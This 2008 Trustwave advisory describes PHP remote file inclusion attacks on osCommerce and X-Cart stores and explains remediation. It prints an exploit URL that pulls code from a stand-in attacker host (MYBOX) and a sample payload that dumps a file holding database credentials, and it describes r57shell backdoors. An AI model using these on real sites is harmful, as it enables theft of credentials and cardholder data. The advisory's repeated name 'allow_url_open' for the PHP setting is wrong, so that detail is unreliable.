Trustwave has seen an increase in PHP-based e-commerce sites being exploited through remote file inclusion vulnerabilities. These vulnerabilities allow attackers to execute malicious code on vulnerable systems by configuring PHP to include files from remote sites. Attackers often use this to install backdoors like r57shell that give them continued access. E-commerce sites can prevent this by disabling the PHP register_globals and allow_url_open settings in php.ini, as well as keeping applications like osCommerce and X-Cart up to date with the latest security patches.

1. E-commerce Security Advisory: PHP Remote File Inclusion
Executive Summary
In investigations of approximately 300 payment card data security breaches, Trustwave’s compromise
investigations unit has observed an increase in the successful exploitation of PHP‐based e‐commerce Web
sites via remote file‐inclusion vulnerabilities. We believe that this increase is due to the prevalence of
PHP‐based e‐commerce applications and the ease with which an attacker can exploit these applications’
vulnerabilities.
In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which
an attacker took advantage of remote file‐inclusion vulnerabilities in PHP‐based e‐commerce
applications. The vendors of these applications have released updates to secure the vulnerabilities, but
the root problem lies in the application user’s configuration of the applications and installation of PHP
programming language on their server.
Properly configuring the PHP programming language on a server can easily eliminate a system’s
vulnerability to PHP remote file‐inclusion exploits. Two configuration directives included within PHP,
register_globals and allow_url_open, make the PHP remote file inclusion exploit possible. When enabled,
either of these directives may allow malicious users to execute their own PHP code on a vulnerable
system.
Fortunately, through the php.ini configuration file, register_globals and allow_url_open directives can be
disabled easily. In addition, PHP versions 4.2.0 or later disable register_globals by default, and the
directive is not included in PHP version 6.0.
Trustwave recommends that online merchants perform stringent code reviews to ensure that their e‐
commerce applications are properly patched and that the PHP on their servers is securely configured.
PHP Remote File Inclusion
Trustwave has seen an increase in the successful exploitation of PHP‐based e‐commerce Web sites via
remote file‐inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP‐based e‐
commerce applications and the simplicity of exploiting these vulnerabilities.
PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is
particularly susceptible to the remote file‐inclusion exploit because the default installation of vulnerable
versions that leaves register_globals or allow_url_open enabled on the server opens a route through which a
remote system can execute PHP code as if it were located on the local system.

2. For example, the include_once.php script included with vulnerable versions of the PHP‐based osCommerce
Online Merchant application provides one such route. The contents of the include_once.php script include
the following:
.
-------- include_once.php -------<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
---------------------------------
An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a
remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php
This request would execute the a.php script located on the attacker’s Web site (MYBOX) on the e‐
commerce server. The code included will vary depending on the attacker’s goals.
For example, the following command would output the contents of the application_top.php file present on
the e‐commerce Web site. The contents of the file include authentication credentials (username,
password, database location) for the backend MySQL customer database.
--- a.php --<? passthru("/bin/cat application_top.php")?>
------------
In an actual case of PHP remote file inclusion, the code executed would be significantly more complex
than in this example and often results in the download of Web‐based backdoors to the local system. Two
common Web‐based backdoors are r57shell and c99shell. These shells include a Web‐based interface that
enables their user to download and upload files, create backdoor listeners that monitor traffic on the
system, send e‐mail, bounce connections to other servers and administrate SQL databases.
The following represents the main interface of the r57shell:
Copyright 2008, Trustwave
Page 2 of 5

3.
r57shell Interface
With the r57shell copied to the compromised system, the attacker can easily modify existing Web code
from a local Internet browser. In many cases the attacker will modify PHP code associated with the e‐
commerce application checkout process to send cardholder data to an external e‐mail account or force the
storage of cardholder data to the backend database for the attacker to retrieve at a later date.
Copyright 2008, Trustwave
Page 3 of 5

4.
PHP Remote File Inclusion Diagram
Attacker’s Workstation
1. The attacker targets the vulnerable PHP code and
instructs the server via a Web browser to include the
a.php file present on the attacker’s Web site.
Vulnerable PHP-based ecommerce Web si te
2. The a.php PHP script is
included and executed on
the e-commer ce Web site.
Attacker’s Website
a.php
r57shell.php
3. The a.php PHP script instructs
the server to download the
r 57shell.php backdoor to the ecommerce Web site.
Targeted PHP-based E-commerce Applications and Remediation
In a number of our recent investigations of payment card compromises, Trustwave has found a number
of attacks targeting vulnerable versions of PHP‐based e‐commerce applications such as osCommerce and
X‐Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a
remote file‐inclusion exploit to gain access to a system and extract sensitive information. We suspect that
this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease
with which these vulnerabilities can be exploited.
The most common manifestation of the PHP remote file‐inclusion exploit observed by Trustwave results
in the download of a malicious Web‐based backdoor onto an e‐commerce server and the subsequent
alteration of PHP code associated with the checkout process allowing for the harvest of cardholder data.
Copyright 2008, Trustwave
Page 4 of 5

5. Remote file inclusion vulnerabilities in both the osCommerce and X‐Cart applications have been publicly
disclosed:
Remote file inclusion vulnerabilities
Application
Vulnerable File
Disclosure Date
Reference
osCommerce Online Merchant v2.1
include_once.php
06/16/2002
Bugtraq ID: 5037
Qualiteam X-Cart 4.x
cmpi.php
09/08/2006
Bugtraq ID: 20108
Qualiteam X-Cart 3.5.0
config.php
09/11/2007
Bugtraq ID: 25637
prepare.php
smarty.php
product.php
auth.php
Although the vendors listed above have released updates to patch the vulnerabilities, the root problem
lies on the application user’s side with the configuration of the PHP programming language on their
server.
E‐commerce merchants can easily avoid PHP remote file‐inclusion exploits by properly configuring the
PHP programming language installed on their server. The majority of PHP remote file‐inclusion exploits
are possible because of two configuration directives included within PHP; register_globals and
allow_url_open. When enabled, either of these directives may allow the inclusion of files from a remote site
for local execution.
An administrator can easily disable the register_globals and allow_url_open directives in the php.ini
configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the
register_globals directive has been removed altogether.
In conclusion, to protect against PHP remote file‐inclusion exploits, Trustwave recommends that e‐
commerce merchants perform stringent code reviews to ensure that their e‐commerce applications are
properly patched and securely configured. At the very least, this process should include disabling the
register_globals and allow_url_open PHP directives in the php.ini configuration file.
About Trustwave
Trustwave is a global provider of information security and compliance management solutions to businesses and the
public sector. The company has serviced more than 30,000 organizations throughout the world including banks,
merchants, service providers and software developers that are required to validate compliance with industry best
practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa
International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer
(SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South
America, Europe, the Middle East, Africa, Asia and Australia.
Copyright 2008, Trustwave
Page 5 of 5